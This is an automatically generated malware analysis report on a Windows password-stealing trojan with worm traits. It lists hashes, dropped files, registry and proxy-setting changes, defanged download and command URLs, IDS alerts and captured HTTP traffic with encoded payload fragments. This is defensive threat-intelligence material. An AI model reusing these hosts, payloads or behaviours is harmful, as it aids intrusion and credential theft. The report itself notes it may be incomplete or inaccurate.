Gen.Variant.Strictor.115846_da6afddc70

by malwarelabrobot on February 20th, 2017 in Malware Descriptions.

Susp_Dropper (Kaspersky), Gen:Variant.Strictor.115846 (B) (Emsisoft), Gen:Variant.Strictor.115846 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: da6afddc709bf99c8f44945efe6caf49
SHA1: 6bc754b750b8c077457f321b60694e216c534c14
SHA256: ca84817a5816452f053f16d916d545124974352dec483d2f3111d5ac085de4d9
SSDeep: 24576:ztZ CfrRGaFWn3ED YRojjzS08kTutqun8c9 1b6hL7jWOw4gyXSq1iUJL60CDq:zxcyCED7RwXisu8uUCTwiSq1560CDq
Size: 1651712 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-02-05 16:20:56
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-PSW. Trojan program intended for stealing users passwords.

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):

TcService.exe:2764

The Trojan injects its code into the following process(es):

sesvcs_963_56089.exe:1956
%original file name%.exe:3308

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process TcService.exe:2764 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\23.txt (30170 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\01[1].txt (26410 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SB1GUIDO.txt (111 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\NamuADLook[1].dll (16650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\26993501420171281319931[1].htm (29233 bytes)
C:\CF_Helper.dll (202 bytes)
%Program Files%\NamuADLook.dll (20370 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\33[1].txt (40 bytes)

The process sesvcs_963_56089.exe:1956 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\ProgramData\MD PlatForm\3073838834852099154 (15 bytes)
%Program Files%\unstall000.exe (3361 bytes)
C:\ProgramData\tmpst\shst (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XG142QU4.txt (114 bytes)
C:\ProgramData\MD PlatForm\2242737149763168244 (15 bytes)
C:\ProgramData\MD PlatForm\UContext (182 bytes)
C:\ProgramData\MD PlatForm\7 (1 bytes)
C:\ProgramData\MD PlatForm\5 (1 bytes)

The process %original file name%.exe:3308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\TcService.exe (1670 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\S0FG29A4.txt (89 bytes)
C:\exdui.dll (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\2672760322016102115848934[1].htm (107215 bytes)

Registry activity

The process TcService.exe:2764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3F 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\tcservice_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process sesvcs_963_56089.exe:1956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\QuestionASK\APP]
"AppPathName" = "%Program Files%\sesvcs_963_56089.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASMANCS]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 40 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\sesvcs_963_56089_RASAPI32]
"FileTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process %original file name%.exe:3308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\da6afddc709bf99c8f44945efe6caf49_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

MD5 File path
15a43a47885c3eff331e97137c08343d c:\CF_Helper.dll
5c7c865bafa4600bf1aca0e60ed8fa5a c:\Program Files\NamuADLook.dll
d342bd6e4b881b21be18a02e2034b01a c:\Program Files\sesvcs_963_56089.exe
d342bd6e4b881b21be18a02e2034b01a c:\Program Files\unstall000.exe
ee904db75d49139181f892ac73859135 c:\TcService.exe
d342bd6e4b881b21be18a02e2034b01a c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\01[1].txt
5c7c865bafa4600bf1aca0e60ed8fa5a c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\NamuADLook[1].dll
c472335b008c5942ec8a162177058111 c:\exdui.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: www.cfzhushou.com
Product Name: www.cfzhushou.com
Product Version: 2.6.0.0
Legal Copyright: Copyright (C) 2017 CF????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.6.0.0
File Description: CF????
Comments: www.cfzhushou.com
Language: Chinese (Simplified, PRC)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 3481600 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 3485696 1622016 1620992 5.54508 019f64b4e813b642777b432d389d114a
.rsrc 5107712 32768 29696 3.76085 57a8228ec969b9e72611e2e156647e31

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/ 115.238.126.133
hxxp://blog.163.com/blog/static/26993501420171281319931/ 115.238.126.133
hxxp://cdct.zhdns.net/aload/as/33.txt
hxxp://xzdownad.zglhsw.com/adpub//01.txt 104.31.197.48
hxxp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll 104.31.197.48
hxxp://publodf.kintip.com.cn/get_apis/paths/UPath0.txt 162.159.211.96
hxxp://publodf.kintip.com.cn/get_apis/paths/lists/urlv8_1.txt 162.159.211.96
hxxp://publodf.kintip.com.cn/get_apis/kword/UContext1.txt 162.159.211.96
hxxp://publodf.kintip.com.cn/get_apis/paths/lists/DH/DHKW.txt 162.159.211.96
hxxp://publodf.kintip.com.cn/ 162.159.211.96
hxxp://down.9udn.com/aload/as/33.txt 122.228.207.207
hxxp://baike2016.blog.163.com/blog/static/26993501420171281319931/ 115.238.126.133


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /aload/as/33.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: down.9udn.com
Cache-Control: no-cache


HTTP/1.0 200 OK
Content-Length: 40
Content-Type: text/plain
Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT
Accept-Ranges: bytes
ETag: "1ee814e288d21:1466"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 19 Feb 2017 03:47:20 GMT
X-Cache: HIT from ctzjwzs2
Via: 1.0 ctzjwzs2 (squid)
Connection: keep-alive
hXXp://xzdownad.zglhsw.com/adpub//01.txtHTTP/1.0 200 OK..Content-Lengt
h: 40..Content-Type: text/plain..Last-Modified: Fri, 17 Feb 2017 05:52
:26 GMT..Accept-Ranges: bytes..ETag: "1ee814e288d21:1466"..Server: Mic
rosoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Sun, 19 Feb 2017 03:47:20
 GMT..X-Cache: HIT from ctzjwzs2..Via: 1.0 ctzjwzs2 (squid)..Connectio
n: keep-alive..hXXp://xzdownad.zglhsw.com/adpub//01.txt..



GET /leesin_2017/blog/static/2672760322016102115848934/ HTTP/1.1
Accept: */*
Referer: hXXp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: blog.163.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 19 Feb 2017 03:41:08 GMT
Content-Type: text/html;charset=GBK
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: NTESBLOGSI=414B2F0E31035AC3EA3D8B3BF0A191E4.yqblog15-8010; Domain=.blog.163.com; Path=/
Set-Cookie: usertrack=c 5 hVipE9RwWyGzEX1iAg==; expires=Mon, 19-Feb-18 03:41:08 GMT; domain=.163.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
5a1..  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "ht
tp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..  <html xmlns
="hXXp://VVV.w3.org/1999/xhtml" xml:lang="zh" lang="zh">..  <hea
d>..    <meta http-equiv="X-UA-Compatible" content="IE=7" />.
.    <meta http-equiv="content-type" content="text/html;charset=gbk
"/>..    <meta http-equiv="content-style-type" content="text/css
"/>..    <meta http-equiv="content-script-type" content="text/ja
vascript"/>..    <meta name="version" content="neblog-1.0"/>.
.    <script type="text/javascript">..      ..      ..      docu
ment.uniqueID!=document.uniqueID&&!!location.hash&&(location.hash=loca
tion.hash); ..      document.domain = location.hostname.replace(/^.*\.
([\w] \.[\w] )$/,'$1');..      window.focus();..      window.getMusicT
imeStamp=function(){return 'db4721d88d4cf492bc8388e52f709b99';};..    
..      //BLOG-647:....OS..............................      (function
(){..        window.setTimeout(function(){..          var _loginUserIc
on = document.getElementById('loginUserIcon');..          var _rsavata
rimg = document.getElementById('rsavatarimg');..          if(!!_loginU
serIcon){..            var _loaded1 = false;..            var _img1 = 
new Image();..            _img1.onload = function(){..                
_loaded1 = true;..                _img1.onload = null;..            };
..            _img1.src = _loginUserIcon.src;..            window.setT
imeout(function(){..        ..5a8..      if(!_loaded1){..         
<<< skipped >>>


GET /get_apis/paths/UPath0.txt HTTP/1.1
Host: publodf.kintip.com.cn
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:41 GMT
Content-Type: text/plain
Content-Length: 708
Connection: keep-alive
Set-Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701; expires=Mon, 19-Feb-18 03:41:41 GMT; path=/; domain=.kintip.com.cn; HttpOnly
Last-Modified: Fri, 17 Feb 2017 13:16:47 GMT
Accept-Ranges: bytes
ETag: "e491d6172089d21:812"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b45da0ec5990-VIE
0g77iaswetswCyLvkQXe1iXbBHaw5CZslWdCJXZ2JXZT9SawF0XyVmdyV2Uv02bj5SM1km
ahxmLzV2ZuFWbv8iOwRHdo1DSUFEUfNUQFZVSM9lRFRkCNcr1YXb/Kjas3v741CyLvkQXe
1iXbBHaw5yajlGbDJXZ2JXZT9SawF0XyVmdyV2Uv02bj5SM1kmahxmLzV2ZuFWbv8iOwRH
do1DSUFEUfRVVO90QDF0XGVERK0QQVByLvkQCJkQXe1iXbRHe05SM0hXZ052bDV1LkJ3b3
t2LzlGch9Fdld2L9gEVBB1XU5URHF0UV9lRFRkCNY918zL252ru8WLIv8SCJkQCd5VLetF
d4RnLXtESE9CSE9yc0NXas9ycoRXYw9ycpBXYfRXZn9SPIR0XEJ1TXt0XGVERK0w9Xnts9
qLv1CyLvkQCJkQXe1iXbRHe05CVQ9ESE9CSE9yc0NXas9ycoRXYw9ycpBXYfRXZn9SPUB1
TfhERfZUREpQD267tC7PvE78wWTexg8yLgACIgACIgASCJ0lXt41WdRHe05SMfhjdsJXdv
MHdzlGbvMHa0FGcvMXawF2X0V2ZvsVPIRVQQ91RJZkTPN0XGVERK0gvxaOsFfrq/CyLvAC
IgACIgACIJkQCJACIgACIgACIg0lXt41WdlDOwYTNb11N1AzM0sVX5kjN2EzW940TJNlUF
Z1XGVERK....


GET /get_apis/paths/lists/urlv8_1.txt HTTP/1.1


Host: publodf.kintip.com.cn
Cache-Control: no-cache
Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:42 GMT
Content-Type: text/plain
Content-Length: 52692
Connection: keep-alive
Last-Modified: Sat, 18 Feb 2017 07:54:41 GMT
Accept-Ranges: bytes
ETag: "80768442bc89d21:812"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b461a15c5990-VIE
=QLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLtoQDt0SLE5URt0SLK0QXe1i
XbBDMy0jQPJFUflVRO9UTP50XLNUSMN0XzAjCN0lXt41WdFmcvN3WdlmauF2Zb1Vdvd2bz
tVX1RWahJ2WdBHaw5ybyB3Yv02bj5SdklWYi5yd3d3WdBHaw5SdklWYi9SbvNmL1RWahJm
L3d3db1VbvNmL1RWahJmLrx2Y6J2W9skUB10XT91SDlETD9lMwoQDd5VLetVXuM2Wd5Cbt
hXdklWYitVXu4Wdb1lL6tVXuA3Wd5SZb1lLlFWbttVXuMHdhR3cb1lL3tVXuMHZhtVX1RW
ahJ2W9skUB10XG91SDlETD9lMwoQDd5VLetFM9I0TSB1XG1kTfN1XLNUSMN0XyAjCN0lXt
41WwADO9I0TSB1XT91SDlETD9lMwoQDd5VLetFMwgTPC9kUQ9lRft0QJx0QfJDMK0QXe1i
XbBDMz0jQPJFUfJVQCxETPJ1QT91UfJDMK0QXe1iXbRTPFx0QZN0XLNUSMN0XyAjCN0lXt
41Wy0TRMNUWD91VPh0UfFDMK0QXe1iXb11Lt92YuEzbhJWZoNmL3d3dv8iOwRHdotVPLJV
QN9FUNVlSfFDMK0QXe1iXbBDO9gVQN91VPh0UfFDMK0QXe1iXbBTM94USN91VPh0UfFDMK
0QXe1iXbBTPYFUTfdUQQ9FUNVlSfFDMK0QXe1iXbBTPOlUTfdUQQ9FUNVlSfFDMK0QXe1i
XbBDMx0zVPh0UfFDMK0QXe1iXbFDZh1DZhZSM98mJx0Ta/AHaw5CU4gzYyMXYyV2d5R3Lt
92YuEzbhJWZoNmL3d3dv8iOwRHdo1DTSV1XwAjCN0lXt41Wx0zQQ10XZJFVTl0XwAjCN0l
Xt41Wx0jVMd0XFNVVTl0XwAjCN0lXt41Ww0DRM90XFNVVTl0XwAjCN0lXt41WwAjM9UkVP
10XOlUTY9FMwoQDd5VLetFM50DUPJFUfVkVP1ETPRlUfBDMK0QXe1iXbBzN9I0TSB1XOlU
TUJ0XwAjCN0lXt41W1ITPC9kUQ9lTJRlRFx0XwAjCN0lXt41Ww0TRQlFVft0QJx0QWB1Xw
AjCN0lXt41WwADM00TRH5UQS9FVJF0VfRUQPJ1XwAjCN0lXt41Ww0TRH5UQS91QN10XwAj
CN0lXt41Ww0jTJ10XD1UTfBDMK0QXe1iXbJTPFdkTBJ1XEF0TS9FMwoQDd5VLetlM94USN
9FRB9kUfBDMK0QXe1iXbBDMyETPDZkQfV0ROFkUfRVSBd1XwAjCN0lXt41WwAjM9MkRC9l
TJ10XUlUQX9FMwoQDd5VLetFM30TRH5UQS9FVJF0VfBDMK0QXe1iXbBjN94USN9FVJF0Vf
BDMK0QXe1iXbFDZh1TRNFkTTNVQMN0XwAjCN0lXt41Wx0TRD5UQJxETB9VWCRVSNlETfBD
MK0QXe1iXbJTPEl0XFBVWUN0XwAjCN0lXt41W00DRJ9VRD5UQJxETB9FMwoQDd5VLe
<<< skipped >>>

GET /get_apis/kword/UContext1.txt HTTP/1.1


Host: publodf.kintip.com.cn
Cache-Control: no-cache
Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:43 GMT
Content-Type: text/plain
Content-Length: 12412
Connection: keep-alive
Last-Modified: Mon, 01 Dec 2014 19:36:36 GMT
Accept-Ranges: bytes
ETag: "b07def1e9edd01:812"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b469625b5990-VIE
BDM04iM2UDNy4yNuczLyV2c39mcCFVUgYzMuczM18SayFmZhNFI4QjLwUjNx4CMuEzMvUW
bvJHaDBSKvt2YldEIltWasBCLM1EVItEKgYzMuczM18CdptkYldVZsBHcBBSKx4iNgQlTg
M3dvRmbpdFKgAjL18SYsxWa69WTgoDduV2ZB1iclNXVbpQDdlCMwQjLyYTN0IjL34yNvIX
Zzd3byJUURByOw4iNvQnblRWayRFI7EjL2ACVOByc39GZul2VgsDMuATMgUUST1EI7UGbi
lGdhBXbvNGKgAjL18SYsxWa69WTgoDduV2ZB1iclNXVbpQDdZzMuczM18SayFmZhNFI3ET
MuATN3EjLw4yMz8SZt9mcoNEIp82ajV2RgU2apxGIswUTUh0SoAiNz4yNzUzL0l2SiV2Vl
xGcwFEIpEjL2ACVOByc39GZul2VoACMuUzLhxGbpp3bNBiO05WZnFULyV2cVtlCN0lNgQG
by92VlhGVgYzMuczM18SayFmZhNFIzYjLwUjNx4CMuEzMvUWbvJHaDBSKvt2YldEIltWas
BCLM1EVItEKgYzMuczM18CdptkYldVZsBHcBBSK0YzVPdFI7EjL2ACVOByc39GZul2VoAC
MuUzLhxGbpp3bNBiO05WZnFULyV2cVtlCN0VMz4yNzUzLpJXYmF2UgQjNuATM0EjLw4iNy
8SZt9mcoNEIp82ajV2RgU2apxGIswUTUh0SoASMz4yNzUzL0l2SiV2VlxGcwFEIpEjL1AC
VOByc39GZul2VoACMuUzLhxGbpp3bNBiO05WZnFULyV2cVtlCN0lNz4yNzUzLpJXYmF2Ug
UjMx4SN4kTMuAjL2MzLl12byh2QgkybrNWZHBSZrlGbgwCTNRFSLhCI2MjL3MTNvQXaLJW
ZXVGbwBXQgkSMuUDIU5EIzd3bk5WaXhCIw4SNvEGbslmev1EI6QnbldWQtIXZzV1WK0QXw
IjL54CMuIzLvZ3bOx2bvNEI2MjL3MTNvkmchZWYTBCMxEjLzUDNx4CMucjMvUWbvJHaDBS
Kvt2YldEIltWasBCLM1EVItEKgYzMuczM18CdptkYldVZsBHcBBSKx4SNgQlTgM3dvRmbp
dFKgAjL18SYsxWa69WTgoDduV2ZB1iclNXVbpQDdZzMuczM18SayFmZhNFIw4SOzcjLw4S
MvIXZzd3byJUVgcDMx4CMwcTMuAjLyMzLl12byh2QgkybrNWZHBSZrlGbgwCTNRFSLhCI2
MjL3MTNvQXaLJWZXVGbwBXQgkSMuYDIU5EIzd3bk5WaXhCIw4SNvEGbslmev1EI6QnbldW
QtIXZzV1WK0QX2MjL3MTNvkmchZWYTBSMwEjL5kTNx4CMuAzMvUWbvJHaDBCMwATMuIjLz
4CNv42boRHeh1EIp82ajV2RgU2apxGIswUTUh0SoAiNz4yNzUzL0l2SiV2VlxGcwFEIpQj
NX90VgsTMuYDIU5EIzd3bk5WaXhCIw4SNvEGbslmev1EI6QnbldWQtIXZzV1WK0QX2
<<< skipped >>>

GET /get_apis/paths/lists/DH/DHKW.txt HTTP/1.1


Host: publodf.kintip.com.cn
Cache-Control: no-cache
Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:46 GMT
Content-Type: text/plain
Content-Length: 103236
Connection: keep-alive
Last-Modified: Mon, 01 Dec 2014 19:37:06 GMT
Accept-Ranges: bytes
ETag: "2d4a3309edd01:812"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3336b476c3f45990-VIE
oL19Kd3Ivf1HHboCzi P3qvQPb4Wr9v43LL6SdvSTct1rs1KTqx8DLLka82Rv6y9qc1Izi
 Jfa00Hs3WTMssUu19P70XvOwIXLLdjMwD7M07X9x9Kq8C/ML4GL6JT7zlfMw1ydunfLqN
zSp yPskaM/wCdv0OssKzC2QH tOr75IvMyuWs6LDDNs0OwtS93w6O7Tft45yi61S7zJjr
wwyswsA8tkSd2PDdwweML6vb6Lbsx9qspyb60pmLLner8HD71s/bvKzqx9jML6SdvSffwL
jsrFndyso/uPHczLzCq327tKfb98Wr0oeNL u8q5Gusiet 5C8waTd RXP1K0ALwL8qILL
sHHboCTeyieNLQPb4WXDMwIzMsoL19Kdoya6sYjLLka82Rv6yEX73PHvws46uGz7pRTfw6
nLwDzS9KzLvlbd/zSLti6ML6SdvS3NyAPszQvf1G/rv4yCuxiey0 c5H7duNPNLmSrp6Sc
tkOb/5Sqx8DLLKfb98iN0hfrz6eOys8Nsuz 0XH9xs0Ow6T7yDPNv0 cy4yizWj616ns9U
n9zQHMsHzi/8Sex6vb6Lbsx9q897S7tsc6tyf8r2eet9qMq2ycusMsu3H8yIb/16SdvSLN
vETML6v7zB38yySb5zyNxbPLLoebv3q8t1zLx1Osus47yrmb4yK61LjcvLrQDs0NyAP8xx
Gqw6n7q6yC0zGu10AjM2wiuU3r0in77KzCpGvd0ruM512qv9q8q6yy8Hrq0nGN9BPPtDT8
08yirHndygbrqSXu19P7vya wsoL19KN2QHqwOD9 VzStQr/uTXLtP3du2HLLDPd03WvyW
rs74C9xkaM/wyyw6qL19KN2QH tSzLxEzytGrvsfDr7sXr0oeNL4GL6JT7zJjr03qay8SN
LObNw3qfy2Td2PDdwweML6vb6Lbsx9qctjzyp3K/xoaLz5aNuNbLL1r89BvMy0SroOzdui
6ML6v7zBXtyNv8r2S91sUvysad6zq8t1zLL u8q5Gusied RXP15vcoXD907OsCNwSzQvf
1HHboCrfurqLLQPb4WHDMyYDL6SdvS3M07XNL0ir3QTqxbH9qL3ryrqLLnGN9BrfyG/rvx
yS9KXu19PL58euzsccshKszQvf1djMwDzCuxiey0 c5HPas3uLLkaM/w6s15Hd9UzytGrv
sEXL2QH tsAvwvWLt3G ufDr7sLeuKLLL4GL6JXL06vLtPnMusEqsyyb2PDdwweMw3SK1O
r75Izi 7m yGbcvK3fwzrMLcnc69e6tyf8r2eetsg6t9e79BvMy02s3Ozi 72f1D37zB38
ys0M0cvsy3WPvsaN/OzivLvauKft4NHusie9q2atxK0ALHHboCj6tknsoXzC0zGu1rXt95
u2cuxyw6 cvIHruU3r0G/L0ELNvETMLdj8 VTqxbH9qLnb0sIP0MP7pRTfw6nroTzS5W3/
skPr7Mve17KNLSzLqX7M07X9vya wsQbw43Muxiey0 c5HzCpz2fukaM/wacwObNtD
<<< skipped >>>

GET / HTTP/1.1


Host: publodf.kintip.com.cn
Cache-Control: no-cache
Cookie: __cfduid=d6eee63be45249628269d3f301d7655041487475701


HTTP/1.1 200 OK
Date: Sun, 19 Feb 2017 03:41:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Content-Location: hXXp://publodf.kintip.com.cn/iisstart.htm
Last-Modified: Wed, 21 Dec 2016 05:14:24 GMT
ETag: "2c246518495bd21:812"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
